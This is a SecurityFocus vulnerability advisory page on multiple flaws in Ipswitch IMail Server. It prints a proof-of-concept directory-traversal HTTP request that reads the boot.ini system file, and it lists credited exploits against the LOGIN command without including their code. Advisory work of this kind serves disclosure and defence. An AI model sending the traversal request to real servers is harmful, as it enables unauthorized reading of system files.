Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Ipswitch IMail Server Multiple Vulnerabilities

The following proof of concept for the directory-traversal issue is available:

GET /bla.jsp?\..\..\..\..\..\..\..\..\..\..\boot.ini HTTP/1.0

An exploit targeting the 'username' parameter of the LOGIN command has been provided by <nolimit@coreiso.org>.

Another exploit (imail.pl) targeting the LOGIN command has been provided by kcope.

An exploit (13727.c) targeted the LOGIN command is available by Heretic2.







 

Privacy Statement
Copyright 2009, SecurityFocus